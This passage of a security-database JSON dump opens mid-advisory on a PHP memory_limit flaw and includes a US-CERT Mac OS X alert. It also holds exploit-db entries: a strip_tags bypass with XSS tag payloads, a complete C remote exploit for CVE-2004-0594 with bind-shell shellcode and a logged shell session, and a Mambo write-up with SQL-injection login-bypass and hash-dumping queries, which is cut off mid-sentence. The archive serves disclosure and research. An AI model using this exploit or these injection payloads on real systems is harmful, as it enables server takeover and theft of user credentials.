This\r\n can be abused to execute arbitrary code on remote PHP servers.\r\n \r\n \r\nDetails:\r\n \r\n On the 28th June 2004 Georgi Guninski released his advisory about\r\n a possible remote DOS vulnerability within Apache 2 (CAN-2004-0493).\r\n This vulnerability allows tricking Apache 2 into accepting arbitrary\r\n sized HTTP headers. Guninski and many others rated this bug as "Low\r\n Risk" for 32bit systems, but they did not take into account that \r\n such a bug could have a huge impact on 3rd party modules.\r\n \r\n After his advisory was released I reaudited PHP's memory_limit \r\n request termination, because this bug made it possible to reach the \r\n memory_limit at places that were never meant to be interrupted. \r\n After a possible exploitation path for Apache 2 servers was \r\n discovered and a working exploit was created, similar paths were \r\n found and added to the proof of concept exploit that allowed\r\n exploitation of NON Apache 2 servers. (f.e. Apache 1.3.31)\r\n \r\n The idea of the exploit is simple. When PHP allocates a block of\r\n memory it first checks in the cache of free memory blocks for a block\r\n of the same size. If such a block is found it is taken from the cache\r\n otherwise PHP checks if an allocation would violate the memory_limit.\r\n In that case the request shutdown is triggered through zend_error(). \r\n (PHP < 4.3.7 aborts after the violating memory block is allocated)\r\n PHP contains several places where such an interruption is unsafe.\r\n An example for such places are those where Zend HashTables are \r\n allocated and initialised. This is performed in 2 steps and the\r\n initialisation step itself allocates memory before important members\r\n are correctly initialised. 
An attacker that is able to trigger the\r\n memory_limit abort within zend_hash_init() and is additionally able\r\n to control the heap before the HashTable itself is allocated, is \r\n able to supply his own HashTable destructor pointer.\r\n \r\n Several places within PHP were found where this action is performed\r\n on HashTables that actually get destructed by the request shutdown.\r\n One of such places is f.e. within the fileupload code, but is only \r\n triggerable on Apache 2 servers that are vulnerable to CAN-2004-0493, \r\n another one is only reachable if variables_order was changed to have \r\n the "E" in the end, a third one is within session extension which is \r\n activated by default but the vulnerability can not be triggered if\r\n the session functionality is not used. A fourth place is within the\r\n implementation of the register_globals functionality. Although this\r\n is deactivated by default since PHP 4.2 it is activated on nearly\r\n all servers that have to ensure compatibility with older scripts.\r\n Other places might exist in not default activated or 3rd party\r\n extensions.\r\n \r\n All mentioned places outside of the extensions are quite easy to\r\n exploit, because the memory allocation up to those places is \r\n deterministic and quite static throughout different PHP versions.\r\n The only unknown entity is the size of the environment vars array.\r\n But that is usually small and can be bruteforced with some kind\r\n of binary search algorithm. Additionally this information could\r\n leak to an attacker through an open phpinfo() page. 
If the admin\r\n used php.ini-recommended as configuration basis it is irrelevant\r\n anyway because the ENV array is not populated in that case.\r\n \r\n Because the exploit itself consist of supplying an arbitrary \r\n destructor pointer this bug is exploitable on any platform.\r\n (Except the system runs with non exec heap+stack protection)\r\n This includes systems running Hardened-PHP <= 0.1.2 because they\r\n have no protection of the HashTable destructor pointer.\r\n \r\n As a last word it should be said, that an attacker does not need\r\n to send 8/16/64MB (or whatever the memory_limit is) per attack.\r\n With POST requests it is quite easy to eat 100 (and more) times \r\n the amount of sent bytes.\r\n\r\n\r\nProof of Concept:\r\n\r\n e-matters is not going to release an exploit for this vulnerability\r\n to the public.\r\n \r\n\r\nDisclosure Timeline:\r\n\r\n 07. July 2004 - Vendor-sec was informed about the fact that this\r\n vulnerability was found\r\n 14. July 2004 - Public Disclosure\r\n\r\n\r\nCVE Information:\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\n assigned the name CAN-2004-0594 to this issue.\r\n\r\n \r\nRecommendation:\r\n\r\n If you are running PHP with compiled in memory_limit support, it is\r\n strongly recommended that you upgrade as soon as possible to the \r\n newest version. Disabling memory_limit within your configuration can\r\n be considered a workaround, but leaves your site vulnerable to \r\n memory hungry PHP scripts or POST requests that create huge variables.\r\n If you are running PHP with Apache <= 2.0.49 ensure that you have the\r\n fix for CAN-2004-0493 applied.\r\n \r\n \r\nGPG-Key:\r\n\r\n http://security.e-matters.de/gpg_key.asc\r\n \r\n pub 1024D/3004C4BC 2004-05-17 e-matters GmbH - Securityteam \r\n Key fingerprint = 3FFB 7C86 7BE8 6981 D1DA A71A 6F7D 572D 3004 C4BC\r\n\r\n\r\nCopyright 2004 Stefan Esser. 
All rights reserved.\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "modified": "2004-07-14T00:00:00", "published": "2004-07-14T00:00:00", "id": "SECURITYVULNS:DOC:6484", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6484", "title": "[Full-Disclosure] Advisory 11/2004: PHP memory_limit remote vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:12", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n\r\n Technical Cyber Security Alert TA05-136A \r\n Apple Mac OS X is affected by multiple vulnerabilities\r\n\r\n Original release date: May 16, 2005\r\n Last revised: --\r\n Source: US-CERT\r\n\r\nSystems Affected\r\n\r\n Mac OS X version 10.3.9 (Panther) and Mac OS X Server version 10.3.9\r\n\r\nOverview\r\n\r\n Apple has released Security Update 2005-005 to address multiple\r\n vulnerabilities affecting Mac OS X and Mac OS X Server. The most\r\n serious of these vulnerabilities may allow a remote attacker to\r\n execute arbitrary code. Impacts of other vulnerabilities addressed by\r\n the update include disclosure of information and denial of service.\r\n\r\nI. Description\r\n\r\n Apple Security Update 2005-005 resolves a number of vulnerabilities\r\n affecting Mac OS X and OS X Server. 
Further details are available in\r\n the following Vulnerability Notes:\r\n\r\n VU#356070 - Apple Terminal fails to properly sanitize input for\r\n x-man-page URI\r\n\r\n Apple Terminal on Mac OS X fails to sanitize x-man-page URIs, allowing\r\n a remote attacker to execute arbitrary commands.\r\n (CAN-2005-1342)\r\n\r\n VU#882750 - libXpm image library vulnerable to buffer overflow\r\n\r\n libXpm image parsing code contains a buffer-overflow vulnerability\r\n that may allow a remote attacker execute arbitrary code or cause a\r\n denial-of-service condition.\r\n (CAN-2004-0687)\r\n\r\n VU#125598 - LibTIFF vulnerable to integer overflow via corrupted\r\n directory entry count\r\n\r\n An integer overflow in LibTIFF may allow a remote attacker to execute\r\n arbitrary code.\r\n (CAN-2004-1308)\r\n\r\n VU#539110 - LibTIFF vulnerable to integer overflow in the\r\n TIFFFetchStrip() routine\r\n\r\n An integer overflow in LibTIFF may allow a remote attacker to execute\r\n arbitrary code.\r\n (CAN-2004-1307)\r\n\r\n VU#537878 - libXpm library contains multiple integer overflow\r\n vulnerabilities\r\n\r\n libXpm contains multiple integer-overflow vulnerabilities that may\r\n allow a remote attacker execute arbitrary code or cause a\r\n denial-of-service condition.\r\n (CAN-2004-0688)\r\n\r\n VU#331694 - Apple Mac OS X chpass/chfn/chsh utilities do not properly\r\n validate external programs\r\n\r\n Mac OS X Directory Service utilities do not properly validate code\r\n paths to external programs, potentially allowing a local attacker to\r\n execute arbitrary code.\r\n (CAN-2004-1335)\r\n\r\n VU#582934 - Apple Mac OS X Foundation framework vulnerable to buffer\r\n overflow via incorrect handling of an environmental variable\r\n\r\n A buffer overflow in Mac OS X's Foundation Framework's processing of\r\n environment variables may lead to elevated privileges.\r\n (CAN-2004-1336)\r\n\r\n VU#706838 - Apple Mac OS X vulnerable to buffer overflow via vpnd\r\n daemon\r\n\r\n Apple 
Mac OS X contains a buffer overflow in vpnd that could allow a\r\n local, authenticated attacker to execute arbitrary code with root\r\n privileges.\r\n (CAN-2004-1343)\r\n\r\n VU#258390 - Apple Mac OS X with Bluetooth enabled may allow file\r\n exchange without prompting users\r\n\r\n Apple Mac OS X with Bluetooth support may unintentionally allow files\r\n to be exchanged with other systems by default.\r\n (CAN-2004-1332)\r\n\r\n VU#354486 - Apple Mac OS X Server Netinfo Setup Tool fails to validate\r\n command line parameters\r\n\r\n Apple Mac OS X Server NeST tool contains a vulnerability in the\r\n processing of command line arguments that could allow a local attacker\r\n to execute arbitrary code.\r\n (CAN-2004-0594)\r\n \r\n Please note that Apple Security Update 2005-005 addresses additional\r\n vulnerabilities not described above. As further information becomes\r\n available, we will publish individual Vulnerability Notes.\r\n\r\nII. Impact\r\n\r\n The impacts of these vulnerabilities vary, for information about\r\n specific impacts please see the Vulnerability Notes. Potential\r\n consequences include remote execution of arbitrary code or commands,\r\n disclosure of sensitive information, and denial of service.\r\n\r\nIII. Solution\r\n\r\nInstall an Update\r\n\r\n Install the update as described in Apple Security Update 2005-005.\r\n\r\nAppendix A. 
References\r\n\r\n * US-CERT Vulnerability Note VU#582934 -\r\n <http://www.kb.cert.org/vuls/id/582934>\r\n \r\n * US-CERT Vulnerability Note VU#258390 -\r\n <http://www.kb.cert.org/vuls/id/258390>\r\n \r\n * US-CERT Vulnerability Note VU#331694 -\r\n <http://www.kb.cert.org/vuls/id/331694>\r\n\r\n * US-CERT Vulnerability Note VU#706838 -\r\n <http://www.kb.cert.org/vuls/id/706838>\r\n\r\n * US-CERT Vulnerability Note VU#539110 -\r\n <http://www.kb.cert.org/vuls/id/539110>\r\n\r\n * US-CERT Vulnerability Note VU#354486 -\r\n <http://www.kb.cert.org/vuls/id/354486>\r\n\r\n * US-CERT Vulnerability Note VU#882750 -\r\n <http://www.kb.cert.org/vuls/id/882750>\r\n\r\n * US-CERT Vulnerability Note VU#537878 -\r\n <http://www.kb.cert.org/vuls/id/537878>\r\n\r\n * US-CERT Vulnerability Note VU#125598 -\r\n <http://www.kb.cert.org/vuls/id/125598>\r\n\r\n * US-CERT Vulnerability Note VU#356070 -\r\n <http://www.kb.cert.org/vuls/id/356070>\r\n\r\n * Apple Security Update 2005-005 -\r\n <http://docs.info.apple.com/article.html?artnum=301528>\r\n _________________________________________________________________\r\n\r\n These vulnerabilities were discovered by several people and reported\r\n in Apple Security Update 2005-005. Please see the Vulnerability Notes\r\n for individual reporter acknowledgements.\r\n _________________________________________________________________\r\n\r\n Feedback can be directed to the authors: Jeffrey Gennari and Jason\r\n Rafail.\r\n _________________________________________________________________\r\n\r\n Copyright 2005 Carnegie Mellon University. 
Terms of use\r\n\r\n Revision History\r\n\r\n May 16, 2005: Initial release\r\n Last updated May 16, 2005 ", "modified": "2005-05-17T00:00:00", "published": "2005-05-17T00:00:00", "id": "SECURITYVULNS:DOC:8636", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8636", "title": "US-CERT Technical Cyber Security Alert TA05-136A -- Apple Mac OS X is affected by multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T22:55:35", "bulletinFamily": "exploit", "description": "PHP 4.x/5.0 Strip_Tags() Function Bypass Vulnerability. CVE-2004-0595. 
Remote exploit for php platform", "modified": "2004-07-14T00:00:00", "published": "2004-07-14T00:00:00", "id": "EDB-ID:24280", "href": "https://www.exploit-db.com/exploits/24280/", "type": "exploitdb", "title": "PHP 4.x/5.0 Strip_Tags Function Bypass Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/10724/info\r\n\r\nIt is reported that it is possible to bypass PHPs strip_tags() function.\r\n\r\nIt is reported that under certain circumstances, PHPs strip_tags() function will improperly leave malformed tags in place.\r\n\r\nThis vulnerability may mean that previously presumed-safe web applications could contain multiple cross-site scripting and HTML injection vulnerabilities when viewed by Microsoft Internet Explorer or Apple Safari web browsers.\r\n\r\nIt is reported that 'magic_quotes_gpc' must be off for PHP to be vulnerable to this issue. \r\n\r\nIf a web application uses strip_tags() similar to:\r\n$example = strip_tags($_REQUEST['user_input'], \"<b><i><s>\");\r\n\r\nThen possible tags that may lead to exploitation might be:\r\n<\\0script> or <s\\0cript> ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24280/"}, {"lastseen": "2016-01-31T12:37:49", "bulletinFamily": "exploit", "description": "PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit. CVE-2004-0594. 
Remote exploit for linux platform", "modified": "2004-11-27T00:00:00", "published": "2004-11-27T00:00:00", "id": "EDB-ID:660", "href": "https://www.exploit-db.com/exploits/660/", "type": "exploitdb", "title": "PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit", "sourceData": "/* Remote exploit for the php memory_limit vulnerability found by Stefan \r\n * Esser in php 4 (<= 4.3.7) and php 5 (<= 5.0.0RC3).\r\n * \r\n * by Gyan Chawdhary (gunnu45@hotmail.com)\r\n * (felinemenace.org/~gyan)\r\n * \r\n * Greets\r\n * S.Esser for the vuln and mlxdebug.tgz, everything in the code is based on it.\r\n * scrippie, gera, riq, jaguar, girish, n2n ... \r\n *\r\n * Vulnerability:\r\n * The issue is well documented in the advisory. \r\n *\r\n * Exploitation:\r\n * I cud not find a generic way to free a 40 byte chunk which could be later\r\n * used by ALLOC_HASHTABLE. The exploit will construct a fake zend hash table \r\n * which will be sent in the first request. The second request will kick in the\r\n * memory interuption after allocating space for the hashtable and before it is\r\n * initalized. The memory it will use for this allocation will contain the data\r\n * from our previous request which includes the pDestructor pointer pointing to\r\n * our nop+shellcode which is a part of the second request. This happens in the \r\n * zend_hash_destory function. \r\n *\r\n * PS - The exploit is ugly, coded to test the vuln. If anyone knows the trick \r\n * for 40 byte free() then plz drop me a mail. 
Tested on RH 8 php 4.3.7,\r\n * Apache 2.0.49 with register_globals = On \r\n *\r\n * Gyan\r\n *\r\n * \r\n */\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n\r\n#define IP \"127.0.0.1\"\r\n#define PORT 80\r\nint sock;\r\nstruct sockaddr_in s;\r\n\r\nchar request1[]=\r\n\"POST /info.php?a[1]=test HTTP/1.0\"\r\n\"Host: doesnotreallymatter\\r\\n\"\r\n\"User-Agent: mlxdebug\\r\\n\"\r\n\"Accept: text/html\\r\\n\"\r\n\"Connection: close\\r\\n\"\r\n\"Pragma: no-cache\\r\\n\"\r\n\"Cache-Control: no-cache\\r\\n\"\r\n\"Content-Type: multipart/form-data; boundary=------------ \\r\\n BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB \\r\\n\";\r\n\r\nchar request2[]=\r\n\"---------------264122487026375\\r\\n\"\r\n\"Content-Length: 472\\r\\n\"\r\n\"\\r\\n\"\r\n\"-----------------------------264122487026375\\r\\n\"\r\n\"Content-Disposition: form-data; name=\\\"a[][]\\\"\\r\\n\"\r\n\"\\r\\n\"\r\n\"TESTTESTTESTTESTTESTTESTTESTTESTTESTTES \\r\\n\"\r\n\"\\r\\n\"\r\n\"-----------------------------264122487026375--\\r\\n\";\r\n\r\nchar request3[]=\r\n\"POST /info.php?a[1]=test HTTP/1.0\"\r\n\"Host: doesnotreallymatter\\r\\n\"\r\n\"User-Agent: mlxdebug\\r\\n\"\r\n\"Accept: text/html\\r\\n\"\r\n\"Connection: close\\r\\n\"\r\n\"Pragma: no-cache\\r\\n\"\r\n\"Cache-Control: no-cache\\r\\n\"\r\n\"Content-Type: multipart/form-data; boundary=-------------\";\r\n\r\nchar request4[]=\r\n\"---------------264122487026375\\r\\n\"\r\n\"Content-Length: 472\\r\\n\"\r\n\"\\r\\n\"\r\n\"-----------------------------264122487026375\\r\\n\"\r\n\"Content-Disposition: form-data; name=\\\"a[][]\\\"\\r\\n\"\r\n\"\\r\\n\"\r\n\"TESTTESTTESTTESTTESTTESTTESTTESTTESTTES \\r\\n\"\r\n\"-----------------------------264122487026375--\\r\\n\";\r\n\r\n/*Ripped shellcode. 
Runs on port 36864*/\r\nchar shell[]=\r\n\"\\xeb\\x72\\x5e\\x29\\xc0\\x89\\x46\\x10\\x40\\x89\\xc3\\x89\\x46\\x0c\"\r\n\"\\x40\\x89\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\\x80\\x43\\xc6\\x46\"\r\n\"\\x10\\x10\\x66\\x89\\x5e\\x14\\x88\\x46\\x08\\x29\\xc0\\x89\\xc2\\x89\"\r\n\"\\x46\\x18\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\\x14\\x89\\x4e\\x0c\"\r\n\"\\x8d\\x4e\\x08\\xb0\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\\xb0\\x66\"\r\n\"\\xcd\\x80\\x89\\x56\\x0c\\x89\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\x86\"\r\n\"\\xc3\\xb0\\x3f\\x29\\xc9\\xcd\\x80\\xb0\\x3f\\x41\\xcd\\x80\\xb0\\x3f\"\r\n\"\\x41\\xcd\\x80\\x88\\x56\\x07\\x89\\x76\\x0c\\x87\\xf3\\x8d\\x4b\\x0c\"\r\n\"\\xb0\\x0b\\xcd\\x80\\xe8\\x89\\xff\\xff\\xff/bin/sh\";\r\n\r\n\r\nvoid xp_connect(char *ip)\r\n{\r\n char buffer[1024];\r\n char temp[1024];\r\n int tmp;\r\n\r\n s.sin_family = AF_INET;\r\n s.sin_port = htons(PORT);\r\n s.sin_addr.s_addr = inet_addr(ip);\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Cannot create socket\\n\");\r\n exit(-1);\r\n }\r\n\r\n if((connect(sock,(struct sockaddr *)&s,sizeof(struct sockaddr))) < 0)\r\n {\r\n printf(\"Cannot connect()\\n\");\r\n exit(-1);\r\n }\r\n}\r\n\r\nvoid xp_write(char *data)\r\n{\r\n\r\n if(write (sock, data, strlen(data)) < 0)\r\n {\r\n printf(\"write() failed\\n\");\r\n exit(-1);\r\n }\r\n}\r\n\r\nvoid xp_receive()\r\n{\r\n int tmp;\r\n char buffer[1024*2];\r\n \r\n \tif ( (tmp = read(sock, buffer, sizeof(buffer))) <= 0)\r\n {\r\n printf(\"read() failed\\n\");\r\n exit(-1);\r\n }\r\n}\r\n\r\nchar fill[] = \" \\r\\n %s \\r\\n \";\r\n\r\n/*This function builds the main request. In destroy_uploaded_files_hash we\r\n * need to pass zend_hash_apply to reach zend_hash_destroy. 
\r\n * We set \r\n * 1) ht->nApplyCount to 0x02020202 to pass HASH_PROTECT_RECURSION \r\n * 2) p->pListNext = 0x00000000 to exit out of zend_hash_apply\r\n * 3) ht->pDestructor = addr to nop+shellcode\r\n * 0x402c22bc <zend_hash_destroy+184>: sub $0xc,%esp\r\n * 0x402c22bf <zend_hash_destroy+187>: pushl 0x8(%esi)\r\n * 0x402c22c2 <zend_hash_destroy+190>: call *%eax\r\n * 0x402c22c4 <zend_hash_destroy+192>: add $0x10,%esp\r\n *\r\n * $eax = ht->pDestructor\r\n */\r\n\r\nvoid build1(int size, int count)\r\n{\r\n\t char *p1, *p2;\r\n\t char *b1, *b2;\r\n\t int i;\r\n\t\tint pot = 0xffffffff;\r\n\t\tint got = 0x41414141;\r\n\t\tint bot = 0x0818ef29; //0x0818ef78;//0x08189870; //0x402b6c08;\r\n\t\tint sot = 0x02020202;\r\n\t\tint ret = 0x081887a8;\r\n\r\n\t\tb1 = (char *)malloc(size-8);\r\n p1 = b1;\r\n\r\n\t\tfor (i=0; i<size-8; i+=36) \r\n\t\t{\r\n\t\t*( (int **)p1 ) = (int *)( pot );\r\n\t\tp1+=4;\r\n\t\t*( (int **)p1 ) = (int *)( got );\r\n\t\tp1+=4;\r\n\t\t*( (int **)p1 ) = (int *)( bot );\r\n\t\tp1+=4;\r\n\t\t*( (int **)p1 ) = (int *)( ret );\r\n p1+=4;\r\n *( (int **)p1 ) = (int *)( bot );\r\n p1+=4;\r\n\t\t*( (int **)p1 ) = (int *)( got );\r\n\t p1+=4;\r\n\t *( (int **)p1 ) = (int *)( bot );\r\n\t p1+=4;\r\n\t\t*( (int **)p1 ) = (int *)( sot );\r\n\t\tp1+=4;\r\n\t\t}\r\n\r\n\t b2 = (char *)malloc(size+1);\r\n\t p2 = b2;\r\n\r\n\t\tsprintf(p2, fill, b1);\r\n\r\n\t for(i=0; i<count; i++)\r\n xp_write(b2);\r\n}\r\n\r\n/*Test function for resetting php memory , does not work properly with \r\n * php_normalize_heap function */\r\nvoid build2(int size, int count)\r\n{\r\n char *p1, *p2;\r\n char *b1, *b2;\r\n int i;\r\n b1 = (char *)malloc(size-8);\r\n p1 = b1;\r\n memset(p1, '\\x42', size-8);\r\n b2 = (char *)malloc(size+1);\r\n p2 = b2;\r\n sprintf(p2, fill, b1);\r\n for(i=0; i<count; i++)\r\n xp_write(b2);\r\n}\r\n\r\n/*TODO*/\r\nchar *php_normalize_heap()\r\n{\r\n\treturn;\r\n}\r\n\r\n/*Builds our shellcode with NOP's and the mem interuption request*/\r\n\r\nvoid 
build3(int size, int count)\r\n{\r\n char *p1, *p2;\r\n char *b1, *b2;\r\n int i;\r\n int pot = 0x90909090;\r\n\r\n\t b1 = (char *)malloc(size-8);\r\n p1 = b1;\r\n \r\n \t for (i=0; i<size-8-strlen(shell); i+=4) {\r\n\t\t *( (int **)p1 ) = (int *)( pot );\r\n\t p1+=4;\r\n }\r\n \t\tp1 = b1;\r\n\r\n\t\tp1+= size - 8 - strlen(shell);\r\n\t\tstrncpy(p1, shell, strlen(shell));\r\n \t \r\n \t b2 = (char *)malloc(size+1);\r\n p2 = b2;\r\n\r\n sprintf(p2, fill, b1);\r\n\r\n for(i=0; i<count; i++)\r\n\t xp_write(b2);\r\n\t }\r\n\t \r\n\r\n\r\nvoid exploit()\r\n{\r\n\r\n\tint i; \r\n\t\r\n\tprintf(\"Stage 1: Filling mem with bad pdestructor ... \");\r\n\tfor (i=0; i< 5; i++)\r\n\t{\t\r\n \t xp_connect(IP);\r\n \t xp_write(request1);\r\n build1(5000, 1);\r\n xp_write(request2);\r\n\t close(sock);\r\n\t}\r\n\tprintf(\"DONE\\r\\n\");\r\n\tprintf(\"Stage 2: Triggering memory_limit now ... \");\r\n\t\t\r\n\txp_connect(IP);\r\n xp_write(request3);\r\n build3(8192, 255);\r\n build3(7265, 1);\r\n xp_write(request4);\r\n\tprintf(\"DONE\\r\\n\");\r\n\tprintf(\"Shell on port 36864\\r\\n\");\r\n\t\r\n}\r\n\r\nmain()\r\n{\r\n\t/*No args, no vectors*/\r\n\texploit();\r\n}\r\n\r\n/*\r\n * Using [][][][] arry its possible to exhaust mem for 1.3.* servers and \r\n *trigger memlimit in _zval_copy_ctor after ALLOC_HASHTABLE\r\n *\r\n * \r\n[root@localhost stuff]# ./cool\r\nStage 1: Filling mem with bad pdestructor ... DONE\r\nStage 2: Triggering mem_limit now ... 
DONE\r\nShell on port 36864\r\n[root@localhost stuff]# telnet 127.0.0.1 36864\r\nTrying 127.0.0.1...\r\nConnected to localhost.localdomain (127.0.0.1).\r\nEscape character is '^]'.\r\nid;\r\nuid=99(nobody) gid=4294967295 groups=4294967295\r\nuname -a;\r\nLinux localhost.localdomain 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux\r\n*/\r\n\r\n\n\n// milw0rm.com [2004-11-27]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/660/"}, {"lastseen": "2018-01-24T14:28:59", "bulletinFamily": "exploit", "description": "Mambo < 4.5.3h - Multiple Vulnerabilities. CVE-2006-0871,CVE-2006-1794. Webapps exploit for PHP platform", "modified": "2016-02-24T00:00:00", "published": "2016-02-24T00:00:00", "id": "EDB-ID:43835", "href": "https://www.exploit-db.com/exploits/43835/", "type": "exploitdb", "title": "Mambo < 4.5.3h - Multiple Vulnerabilities", "sourceData": "Mambo Multiple Vulnerabilities\r\n\r\nVendor: Miro International Pty Ltd\r\nProduct: Mambo\r\nVersion: <= 4.5.3h\r\nWebsite: http://www.mamboserver.com\r\n\r\nBID: 16775 \r\nCVE: CVE-2006-0871 CVE-2006-1794 \r\nOSVDB: 23402 23503 23505 \r\nSECUNIA: 18935 \r\nPACKETSTORM: 44191 \r\n\r\nDescription:\r\nMambo is a popular Open Source Content Management System released under the GNU General Public license (GNU GPL). There are a number of security issues in Mambo which allows for SQL Injection, Authentication Bypass, and possible remote code execution via local file inclusion. There has been an updated version of Mambo released and all users are advised to upgrade as soon as possible. Also, please note that these vulnerabilities are NOT related to any worms currently taking advantage of vulnerable Mambo installations. \r\n\r\n\r\nSQL Injection:\r\nThere are several SQL Injection issues in Mambo Open Source. The easiest to exploit of the issues allows an attacker to login as any user. 
The only info the attacker has to have is the target username (if no user is specified, the first user from the users table will be selected instead). \r\n\r\nfunction login( $username=null,$passwd=null ) {\r\nglobal $acl;\r\n\r\n$usercookie = mosGetParam( $_COOKIE, 'usercookie', '' );\r\n$sessioncookie = mosGetParam( $_COOKIE, 'sessioncookie', '' );\r\nif (!$username || !$passwd) {\r\n\t$username = trim( mosGetParam( $_POST, 'username', '' ) );\r\n\t$passwd = trim( mosGetParam( $_POST, 'passwd', '' ) );\r\n\t$passwd = md5( $passwd );\r\n\t$bypost = 1;\r\n}\r\n$remember = trim( mosGetParam( $_POST, 'remember', '' ) );\r\n\r\nif (!$username || !$passwd) {\r\n\techo \"\\n\";\r\n\texit();\r\n} else {\r\n\t$this->_db->setQuery( \"SELECT id, gid, block, usertype\"\r\n\t. \"\\nFROM #__users\"\r\n\t. \"\\nWHERE username='$username' AND password='$passwd'\"\r\n\t);\r\n\t$row = null;\r\n\tif ($this->_db->loadObject( $row )) {\r\n\t\tif ($row->block == 1) {\r\n\t\t\techo \"\\n\";\r\n\t\t\texit();\r\n\t\t}\r\n\t\t// fudge the group stuff\r\n\t\t$grp = $acl->getAroGroup( $row->id );\r\n\t\t$row->gid = 1;\r\n\r\n\t\tif ($acl->is_group_child_of( $grp->name, 'Registered', 'ARO' ) ||\r\n\t\t$acl->is_group_child_of( $grp->name, 'Public Backend', 'ARO' )) {\r\n\t\t\t// fudge Authors, Editors, Publishers and Super Administrators \r\n\t\t\tinto the Special Group\r\n\t\t\t$row->gid = 2;\r\n\t\t}\r\n\r\nThe above code is from mosMainFrame class (/includes/mambo.php) and is the source of the previously mentioned problem. The function mosGetParam() for the most part just imports GPC variables, and has no real effective filtering or the like, so several variables shown above contain unsanitized data. These variables include $username, which is shortly thereafter passed to the query, thus allowing a user to bypass a login by supplying a username of \"user'/*\" and any password. 
This is a very serious issue, but should prove easy to fix by either adding better filtering in the mosGetParam() or sanitizing the data within the login() function, or both. If a malicious user is able to use this vulnerability to gain admin privileges then it is pretty much game over as an attacker could then upload, and install a malicious module and execute any php code of their choice on the server. \r\n\r\nAnother issue with Mambo Open Source is data passed to the mosMenuCheck() function is usually unsanitized in regards to the $task parameter. \r\nfunction mosMenuCheck( $Itemid, $menu_option, $task, $gid ) {\r\nglobal $database;\r\n$dblink=\"index.php?option=$menu_option\";\r\nif ($Itemid!=\"\" && $Itemid!=0) {\r\n\t$database->setQuery( \"SELECT access FROM #__menu WHERE id='$Itemid'\" );\r\n} else {\r\n\tif ($task!=\"\") {\r\n\t\t$dblink.=\"&task=$task\";\r\n\t}\r\n\t$database->setQuery( \"SELECT access FROM #__menu WHERE link like '$dblink%'\" );\r\n}\r\n$results = $database->loadObjectList();\r\n$access = 0;\r\n//echo \"\r\n\"; print_r($results); echo \"\r\n\";\r\nforeach ($results as $result) {\r\n\t$access = max( $access, $result->access );\r\n}\r\nreturn ($access <= $gid);\r\n}\r\n\r\nAs seen in the above code the unsanitized $task variable will be used in the query as long as $Itemid is empty. \r\n\r\nhttp://mambo/index2.php?option=com_content&task=-99'%20UNION%20SELECT%201%20FROM%20\r\n\r\nmos_users%20WHERE%20username='admin'%20AND%20MID(password,1,1)='2'/*&id=24&Itemid=0\r\n\r\nIf the first character from the password hash belonging to the user \"admin\" is two as specified above then Mambo displays the error \"You need to login\". This is an easy issue to exploit, and unfortunately mosMenuCheck() is called in the same unsafe manner from other files as well. Last but not least there is an SQL Injection issue in the \"com_content\" component, particularly the showCategory() function. 
\r\n\r\n// get the total number of published items in the category\r\n// filter functionality\r\n$filter = trim( mosGetParam( $_POST, 'filter', '' ) );\r\n$filter = strtolower( $filter );\r\n$and = '';\r\nif ( $filter ) {\r\n\tif ( $params->get( 'filter' ) ) {\r\n\t\tswitch ( $params->get( 'filter_type' ) ) {\r\n\t\t\tcase 'title':\r\n\t\t\t\t$and = \"\\n AND LOWER( a.title ) LIKE '%\". $filter .\"%'\";\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'author':\r\n\t\t\t\t$and = \"\\n AND ( ( LOWER( u.name ) LIKE '%\". $filter .\"%' ) OR \r\n\t\t\t\t( LOWER( a.created_by_alias ) LIKE '%\". $filter .\"%' ) )\";\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'hits':\r\n\t\t\t\t$and = \"\\n AND a.hits LIKE '%\". $filter .\"%'\";\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\r\n}\r\n\r\nAs you can see from the above code, the $filter variable is passed to the query completely unsanitized, and allows for easy to exploit SQL Injection. This is very dangerous. \r\n\r\nfilter=' UNION SELECT 1,2,3,4,CONCAT(username,CHAR(58),password),6,7,8,9,1 FROM mos_users \r\nWHERE 1/*&order=rdate&limit=10&id=0&sectionid=&task=category&option=com_content \r\n\r\nThe above data sent in a post request to the vulnerable script will effectively dump every single username and password hash in the database to the attacker. It should be noted that the above attacks are only effective in the default php environment of magic_quotes_gpc off \r\n\r\n\r\nArbitrary File Inclusion:\r\nIt is possible to include arbitrary 